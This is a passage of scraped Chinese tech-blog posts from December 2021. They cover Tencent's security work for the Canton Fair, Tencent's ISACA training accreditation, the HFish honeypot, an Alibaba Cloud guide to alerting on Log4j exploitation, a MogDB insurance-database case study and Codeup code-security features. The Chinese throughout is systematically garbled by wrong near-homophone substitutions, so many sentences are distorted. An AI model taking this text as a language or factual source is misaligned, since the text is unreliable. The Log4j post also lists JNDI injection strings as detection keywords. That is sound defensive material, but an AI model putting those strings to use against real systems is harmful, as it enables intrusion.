两个月的工夫,他的电脑和手机始终都开着,无论在哪里,随时随地都能被拉起会议,凌晨睡着了被拉会也是常有的事。 他曾经无奈计算本人到底开了多少次会,接了多少个电话,写了多少份资料,他甚至没空在意早上掉的头发叫Jennifer还是Chris,他只记得今天该去做第5次核酸检测。 在广交会“1+8+16+23”的疫情防控计划下,他做了至多8次核酸检测。 03十拿九稳,使命必达越邻近广交会揭幕,Kenty越能感觉到团队氛围变得缓和。 倒计时一天天划去,大量的品质检测和压力测试工作在紧锣密鼓地进行着,批改反馈也越来越频繁。为了保障十拿九稳,大家都在争分夺秒地调整。 整个平安团队处于007的状态,大多数人切实顶不住了就趴桌上睡一会,Kenty则整了几张报纸,在角落里给本人铺了张“床”。 可即便是躺在“床”上,睡眠对Kenty来说也是侈靡的。 每次入睡前Kenty都会把整个进攻体系在脑海里过一遍,工夫久了,所有可能呈现的问题和应答措施,都曾经在他脑海里演练了上百次。 十拿九稳,一失万无。 恍惚间,他忽然有回到127届时的错觉。 依照过后打算,项目组本该在5月27日实现封版。但因为需要变动,封版推延。这意味着随时有新增性能,而每个性能都须要团队花大量工夫测验,平安修复的工夫就无奈预留进去。焦灼的状态始终继续到6月10号,平安的调整也继续到了最初一刻。 每个人都是兵士,兵士和衣而眠,枕戈以待。 也是在这张“床”上,他做了很多梦。 梦里有在广交会上成交20万美元的外贸厂商,有卖出“金叶子”走出国门的茶农,有接了3万套咖啡桌订单的厂家,有“连麦”12国的家电企业…… 他晓得,本届广交会不仅能给很多企业带来稳固客源,还将成为883家企业和农村振兴产品叩开世界大门的敲门砖。 做好平安工作,保障的不止是大企业上百万的成交额,更是无数个小企业脱贫致富的路线畅通。 平安,不止是工作,更是他的使命。 “使命必达。”Kenty心想。 04兵士得空驻足熬过了那段时间,终于迎来大考。 海内流量关上,Kenty的眼睛就没有来到过屏幕,团队开始了24小时两班倒的值守。与料想的一样,大流量涌进,威逼暗藏其中。 展会开始1个小时,现场重保小组就收到了一则APT攻打威逼情报:保利国内广场某单位互联网进口存在可疑通信行为,并捕捉了海莲花特种木马样本。 Kenty和他的团队立即对情报进行了研判和处理,就像每天在脑中演练的那样,井井有条。从收到IOC情报到全面溯源排查并更新腾讯云防护监测体系,重保团队只用了不到10分钟。 一切都在把握之中。 但不到最初一刻,Kenty不敢说本人是平安的。 直到下午五点展会圆满结束,参加广交会的近千位重保人员的心才平静下来。第130届广交会,依附腾讯云私有云平台及云原生的平安防护体系,现场重保团队及二线平安产品保障团队共扛下了超28万次网络攻击,新增审核展商、展品类图片超93万张,审核直播间超4.3万个,最终确保0平安危险,0安全事故,交出了满分答卷。 Kenty和他的团队又一次圆满完成了广交会重保工作。 尘埃落定。 Kenty像过来那样对团队示意了感激。两个月来,头一次散场时天还没黑。 他单独坐在会议室里,做了一遍复盘,又翻到第一次散会时棘手写下的重保思路。 只有七步。 但那七步,他走了很屡次。 事毕,Kenty开始拾掇行李。 除了一堆长期采买的衣物,他能带走的仅有一枚广交会的留念徽章。 他将它别在包上,走到哪儿都带着,宛如一名失利归来的兵士,低调又张扬。 紧接着,列车进站。 兵士得空驻足,只待下一次集结。 写在最初一次广交会重保我的项目凝固着近千人的共同努力。网信岗、公安岗、通信治理岗、平安核心岗、国安岗、能源岗、专家岗的部省市三级公职人员和中国对外贸易核心与腾讯公司项目组及其生态合作伙伴组成的重保团队人员,都是这届广交会幕后的网络安全兵士。他们日夜兼程,默默贡献,只为圆满守护世界各地参展商的云上生意,一起,保卫美妙。

December 24, 2021 · 1 min · jiezi

关于安全:腾讯安全获ISACA认证提供一站式安全人才培训服务

近日,腾讯平安成为ISACA(国内信息系统审计协会)官网认证的培训服务机构,发展面向社会的信息安全运维人员认证培训,通过从教学课程、认证、比赛到举荐待业一站式人才培养解决方案,为社会造就新时代需要下的高质量、实战型的信息安全人才。在ISACA颁布的中国14家受权机构中,腾讯平安是两家入选厂商之一。 ISACA是寰球公认的IT治理、网络安全、审计与鉴证、危险管制、数据隐衷爱护以及规范合规的领导组织,致力于推动寰球技术畛域的人才、专业知识和学习的不断进步,为集体提供常识、证书、教育,构建寰球业余社区,以促成他们的职业倒退和企业转型,并使企业可能培训和建设高质量的团队。 随着我国产业数字化的高速倒退,对网络安全的需要和器重水平逐步减少,社会对平安人才的需求量也愈发增多,人才缺口微小。相干机构正在积极探索网络安全职业资格、能力等制度和规范框架,针对平安服务、平安运维等岗位,为企业和社会补齐人才短板。在本次认证中,腾讯平安人才培养解决方案基于新型人才培养模式、一站式教学练服务、平安认证体系、产业人才生态库等全流程人才培养体系,依靠产业平安畛域内丰盛的产品体系、行业顶尖专家领导、网络攻防实训靶场以及校企单干的成功经验,取得ISACA的权威评定。 腾讯基于20余年的平安经营教训,积攒积淀了数据安全、网络安全、身份平安、利用平安、业务平安、终端平安等一系列平安能力。腾讯平安在本身的倒退过程中,吸纳和造就了泛滥平安专家,自2013年起,便开始关注平安教育事业倒退和平安人才的造就,致力于建设平安人才能力模型,制订平安人才培养指标,输入一套卓有成效的腾讯平安人才培养解决方案。 目前,腾讯平安已和北京航空航天大学、西安电子科技大学、广州大学、烟台新工科研究院、武汉学院等院校发展了新型网络安全人才培养及智慧教育的相干单干,通过校企优势互补,构建技术输送高校、人才输送企业的良好生态。将来,腾讯平安也将携手更多政府、高校、机构、企业和生态搭档,摸索新型网络安全人才培养方向,构建翻新的平安人才培养体系,为社会输送既有安全意识、又能在平安技术上引领和冲破的人才力量。

December 23, 2021 · 1 min · jiezi

关于安全:冬日暖阳HFish蜜罐获湖北省咸宁市紧急医疗救援中心实名感谢

对于HFish蜜罐HFish蜜罐是一款社区型收费蜜罐,任何集体和企业都能够在不批改HFish程序以及配套文件的前提下用于集体测试、教学试验或商业环境。 HFish研发团队十分心愿收到客户的需要反馈,如果您正在应用HFish,有任何意见或倡议能够间接加群分割咱们,谢谢~ 平安传送门>> 拜访https://hfish.io/#/即可开始一键部署,也能够扫描下方【HFish官网交换群】二维码进群与咱们交换哦!

December 21, 2021 · 1 min · jiezi

关于安全:Log4j漏洞不仅仅是修复更需要构建有效预警机制

简介:软件的破绽有时不可避免,依据Gartner的相干统计,到 2025 年,30% 的要害信息基础设施组织将遇到安全漏洞。日志服务SLS,可帮忙疾速部署一个预警机制,使得破绽被利用时能够疾速发现并及时响应。通过应用阿里云日志服务SLS,只需两步即可实现攻打检测。 近日,被寰球广泛应用的Java日志框架组件Apache Log4j被曝出一个高危破绽,攻击者仅需一段代码就可近程管制受害者服务器,破绽波及面和危害水平堪比2017年的“永恒之蓝”破绽。 据外媒报道,Steam、苹果的云服务受到了影响,推特和亚马逊也蒙受了攻打,元宇宙概念游戏“Minecraft我的世界”数十万用户被入侵。美联社评论称,这一破绽可能是近年来发现的最重大的计算机破绽。网友们也纷纷感叹,“这个破绽就像把核武器按钮分给了所有人,并且通知大家,大家轻易按按试试”,“这个时代最不缺的大略就是末世感了吧”…… 一、Log4j 为何被喻为“核弹级”引起万众瞩目、程序猿连夜加班的Apache Log4j,是一个基于Java的日志框架,已于2015年8月5日进行保护。Log4j2是其重构降级版本,新增的Lookups办法设计用于通过多种路径动静引入内部变量,被大量用于业务零碎开发,用来记录程序输入输出的日志信息,应用极为宽泛。 因为Log4j2版本可由JNDl注入实现近程代码执行,黑客无需明码就能拜访网络服务器,轻松控制目标设施。据统计,该破绽影响6万多风行开源软件,影响70%以上的企业线上业务零碎。 这一次破绽的影响面之所以如此之大,次要还是因为树大招风,log4j2的应用面切实是太广了。一方面当初Java技术栈在Web、后端开发、大数据等畛域利用十分宽泛,除了大型互联网企业,还有多如牛毛的中小企业抉择Java。另一方面,大量像Kafka、Elasticsearch、Flink、Solr这样的中间件都是用Java语言开发的。在下面这些开发过程中,大量应用了Log4j2作为日志输入,一旦输入的日志有内部输出混进来,就会酿成大祸。 目前Apache官网曾经公布了修复计划,同时各大厂商也曾经给出了对应计划。作为该破绽的发现者,阿里云的应答绝对从容,11月24日就向Apache官网报告了破绽,并第一工夫开始修复自家的相干受影响零碎。 二、如何无效预防此类破绽软件的破绽有时不可避免,依据Gartner的相干统计,到 2025 年,30% 的要害信息基础设施组织将遇到安全漏洞,这将会导致要害信息基础设施经营进行或要害型网络物理零碎进行,而随着基础设施云化过程的放慢,一款云原生观测与剖析平台将至关重要。 日志服务SLS,可帮忙疾速部署一个预警机制,使得破绽被利用时能够疾速发现并及时响应。通过应用阿里云日志服务SLS,只需两步即可实现攻打检测: 1. 将Java程序日志接入SLS首先须要将业务日志接入SLS(如果曾经接入了的可跳过)。 SLS反对十分便捷的接入形式,这里举荐应用文件采集Java程序的日志,具体接入办法包含: 数据采集:日志服务反对采集服务器与利用、开源软件、物联网、挪动端、标准协议、阿里云产品等多种起源的数据。 应用极简模式采集日志:极简模式不对日志内容进行解析,每条日志都被作为一个整体被采集到日志服务中,极大简化了日志采集流程。 在日志接入后,就能够在SLS控制台配置关键词告警。 2. 配置关键字监控该破绽被利用时会产生相应的日志,通过检测以下关键字,即可辨认: "jndi:ldap://" or "jndi:rmi" or "javax.naming.CommunicationException" or "javax.naming.NamingException: problem generating object using object factory" or "Error looking up JNDI resource" 而后点击查问/剖析,(如果有攻打产生,会如下图): 再点击右上角的“另存为告警 -> 新版告警”:配置告警规定如下: 告诉里能够配置语音、钉钉等渠道,如下图所示: 如果日志中有关键字呈现,则会在发送语音和钉钉告诉。 以上,就是构建预警机制的一个繁难流程。最初,鉴于Log4j在全行业和政府应用的云服务器和企业软件中“无处不在”,因而将其更新到稳固版本2.15.0至关重要,同时也要增强监测伎俩,防备灾难性的破绽。 原文链接本文为阿里云原创内容,未经容许不得转载。

December 15, 2021 · 1 min · jiezi

关于安全:MogDB改造渤海财险EAST系统云和恩墨全方位护航数据治理

2020年9月,云和恩墨的数据库产品MogDB正式公布。在短短一年工夫内,这款基于openGauss开源数据库的内核进行研发的产品,疾速且动摇地成长,目前已利用在多家金融企业的相干零碎上。其中,云和恩墨利用MogDB对渤海财险查看剖析零碎(Examination&Analysis System Technology,EAST)进行从新布局和设计,在新架构的落地部署过程中,帮忙客户在业务流程、数据治理和基础架构层面进行了多项的匹配革新工作,使客户零碎的可靠性和整体性能失去晋升,强化了渤海财险数据管理,推动了公司规范化数据治理。 EAST零碎全称Examination and Analysis System Technology,是银监会在2008年开发的具备自主知识产权的查看剖析零碎,旨在适应大数据发展趋势需要,并帮忙监管部门进步查看效力。零碎蕴含银行标准化数据提取、现场查看项目管理、数据模型生成工具、数据模型公布与治理等功能模块。 MogDB成渤海财险数据系统革新新抉择 为夯实财险监管数据根底,晋升相干公司数据治理和危险管控能力,银保监会就《保险业监管数据标准化标准(财险公司版)》(以下简称《标准》)别离于2020年10月和12月两次下发告诉征求意见。2020年10月,监管机关曾下发文件,要求寿险行业各公司在2021年1月18日前实现首次数据报送;财险行业从往年5月份开始进行首次报送,并在往年10月份前实现所有的历史数据报送。 据悉,《标准》蕴含2061个报送数据项,波及财险公司承保、理赔、销售、财务、内控等多方面业务,覆盖面大、牵扯零碎多、革新要求高。从近两年监管部门对于数据报送的要求来看,《标准》参考了行业头部公司的数据治理教训,一旦正式下发执行,财险公司数据报送的工期会比拟短。渤海财险以本次监管数据规范化报送为契机,在公司外部发展数据治理工作,对数据系统进行“查漏补缺”。 如何基于现有公司经营方式提供尽可能符合规范的数据是渤海财险面临的重要问题。同时,公司须要对不能提供满足此次报送要求数据的业务流程进行革新。 此外,数据的规范化必然扭转公司数据结构、汇聚和存取形式,同时对数据存管的品质和效率提出更高的要求。渤海财险须要思考怎么实现合规数据的架构化存取以及数据存取承载零碎选型等问题。 针对以上挑战,渤海财险决定对EAST零碎进行从新设计。新零碎既要满足《标准》提出的各项要求,又要实现安全可靠的高效运维。依附丰盛的数据库畛域服务教训和成熟欠缺的自有数据库产品MogDB,云和恩墨成为渤海财险此次我的项目革新的外围合作伙伴。 MogDB助推EAST零碎架构降级调整 通过对EAST零碎的深入分析,云和恩墨协同渤海财险对现有零碎进行了从新的布局和设计。 EAST零碎架构 依照数据的解决类型,零碎整体架构别离针对批处理和流解决两类业务进行了不同的数据流转设计。通过OGG,零碎可能实现生产数据到数仓的数据归集;同时,Kafka+Flink能够对流数据进行散发和流转反对。EAST零碎最外围的报送库和两头库采纳了云和恩墨的MogDB数据库,零碎的可靠性和整体性能失去晋升。 另外,在新架构的落地部署过程中,云和恩墨帮助客户在业务流程、数据治理和基础架构层面进行了多项的匹配革新工作,如明确对外报送数据范畴/口径、确认数据计算形式及的确数据的解决计划、数据字典汇总整顿、根底数据导入测试、全量数据校验、数据库性能/性能测试、报送效率/能力评估等工作。 通过近3个月的布局、设计和部署,EAST零碎测试环境凋谢试运行。试运行期间的各种业务数据均可满足《标准》批量和增量报送的要求。至今,零碎运行安稳,性能良好。 MogDB助力渤海财险数据库国产化转型更上一层楼 此次我的项目对渤海财险的数据进行了梳理和核查,极大地提高了公司数据规范化程度。具体来看,一方面,公司数据达到了《标准》提出的监管报送要求;另一方面,数据流转更为规范,显著晋升了公司的经营治理工作效率。长期来看,拥抱国产化加强了公司外围竞争力,为实现数字化转型倒退夯实根底,为推动公司高质量、平安倒退提供能力撑持。 据悉,这是渤海财险首次应用国产数据库。云和恩墨的MogDB以稳固高效的运行成果和便捷易维的客户体验,晋升了渤海财险对国产化数据库代替的信念,尤其是MogDB的金融级运行性能(整体业务效率晋升50%以上)、高可用容灾能力(一主八备,RPO=0 ,RTO<10s,GSHA自愈式切换)和便捷易维的管控工具,给渤海财险留下了粗浅的印象。 以此我的项目为根底,渤海财险已开始对现有零碎以及新建零碎进行评估和调研。预计到2022年,渤海财险将实现至多3套以上的次外围业务零碎的国产化代替,逐渐走上全国产自主之路。 对于MogDB MogDB是云和恩墨基于openGauss开源数据库的内核进行研发,推出的一款极致易用的企业级关系型数据库。该产品具备金融级高可用和全密态计算的极致平安、面向多核处理器的极致性能、AI自诊断调优的极致智能能力,可能满足从外围交易到简单计算的企业级业务需要。 云和恩墨致力于施展全栈产品加服务的企业劣势,优先反对鲲鹏算力,在MogDB的运行平台、管理工具、SQL审核和运维服务等方向推出整体解决方案,为用户提供可信赖的企业级产品和服务,为openGauss的开源生态继续贡献力量。

December 14, 2021 · 1 min · jiezi

关于安全:3类代码安全风险如何避免

简介:企业和开发者在解决开源依赖包破绽问题的同时,还须要思考如何更全面地保障本人的代码数据安全。那么有哪些平安问题值得咱们关注呢? 编者按:本次 Apache Log4j2 开源依赖包破绽为所有人敲响警钟,企业的代码作为最重要的数字资产之一,很可能正面临着各种平安危险。 企业和开发者在解决开源依赖包破绽问题的同时,还须要思考如何更全面地保障本人的代码数据安全。那么有哪些平安问题值得咱们关注呢? 第一种,编码中自引入危险破绽例如: 源码编码安全策略问题,如弱加密函数、不平安SSL、Json注入、LDAP操纵、跨站点申请伪造等;敏感信息如 Token、明码等明文泄露引入不平安的二方、三方依赖包第二种,代码数据失落或透露如员工歹意或手误删除代码数据、非核心技术人拜访权限不明导致外围数据泄露等。 第三种,来自内部黑客攻击如存在基础设施、组件破绽导致的被攻打损失。 在如此危机四伏的环境下,云效代码治理平台 Codeup 如何保障企业代码资产平安? 开箱即用的代码检测服务,保障编码环节代码平安 云效 Codeup 为开发者提供了内置的代码平安检测服务:包含依赖包破绽检测、敏感信息检测、源码破绽检测。 开发者能够通过「源码破绽检测」和「敏感信息检测」辨认源码编程中的策略破绽和隐衷泄露问题,通过「依赖包破绽检测」为每次代码变更引入的三方依赖软件包进行充沛的安全检查,并在企业级平安核心和代码库平安页面进行危险数字化治理。除了云效Codeup开箱即用的内置检测服务,开发者也能够简略快捷地在云效Flow流水线平台上灵便对接更多自定义的检测场景。 代码检测 企业平安核心 欠缺事先监测、事中告警、预先审计能力,保障人员行为平安 除了编码层面的危险外,人为的因素也须要关注。 Codeup 为企业提供了一系列人员行为管控能力,笼罩敏感行为检测、平安告警和行为日志剖析审计等能力,帮忙企业更好的在云上管理人员研发合作过程。 「敏感行为检测」基于企业成员的操作行为进行智能剖析,针对成员异样的行动触发正告告诉,帮忙管理者辨认危险并及时处理。 敏感行为监测 「平安告警」与「审计日志」对危险事件进行告诉与记录,辅助审计追责与行为剖析。 日志审计剖析 「代码资源回收站」是解决删库跑路的一个计划,反对删除代码资源时将数据主动移入回收站暂存 15 天,无论是歹意删除还是手误反悔,管理者都能够在回收站有效期内一键复原代码资源,防止因人为因素导致的宝贵资产失落。 代码回收站 云端代码托管爱护代码数据存在云端是否平安? 云效代码托管平台 Codeup 基于阿里云的基础设施,领有阿里云齐备的高防爱护能力;同时通过代码加密技术,反对在服务端上对代码数据进行加密,保障除了企业本身,任何人包含平台人员与黑客均无奈获取代码信息;在数据备份方面,反对企业自主将数据备份至企业指定的对象存储空间,让数据更可控。 云效 Codeup 提供的平安能力还有很多,在拜访平安、数据可信、审计风控、存储平安等角度全方位保障企业代码资产平安,如果你开始器重平安这件事,无妨立刻返回云效 Codeup 开始摸索。 云效代码托管平安服务概览 原文链接本文为阿里云原创内容,未经容许不得转载。

December 14, 2021 · 1 min · jiezi